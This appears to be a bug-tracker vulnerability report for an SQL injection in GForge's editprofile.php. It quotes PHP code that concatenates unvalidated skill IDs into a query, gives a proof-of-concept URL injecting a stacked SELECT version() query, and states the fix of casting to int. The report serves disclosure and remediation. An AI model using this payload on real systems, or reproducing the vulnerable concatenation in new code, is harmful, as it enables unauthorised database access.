Details
Requires to be logged in with any kind of account:
The vulnerable function is handle_multi_edit($skill_ids) on
/www/people/skills_utils.php
$SQL = "select * from skills_data where skills_data_id
in(".$skill_ids[0];
for($i = 1; $i < $numSkills; $i++) {
$SQL .= ", ".$skill_ids[$i];
}
$SQL .= ")";
$result=db_query($SQL);
Vuln site:
http://gforge.org/people/editprofile.php?skill_edit[]=1)%3Bselect+1%2C2%2C3%2Cversion()+as+title%2C5%2C6%3B+--+&MultiEdit=Edit
Affected version
4.5.19 (.. 4.6 maybe?)
Fix
type casting to int before contatenating
|
[#5554] Gforge /people/editprofile.php SQL injection
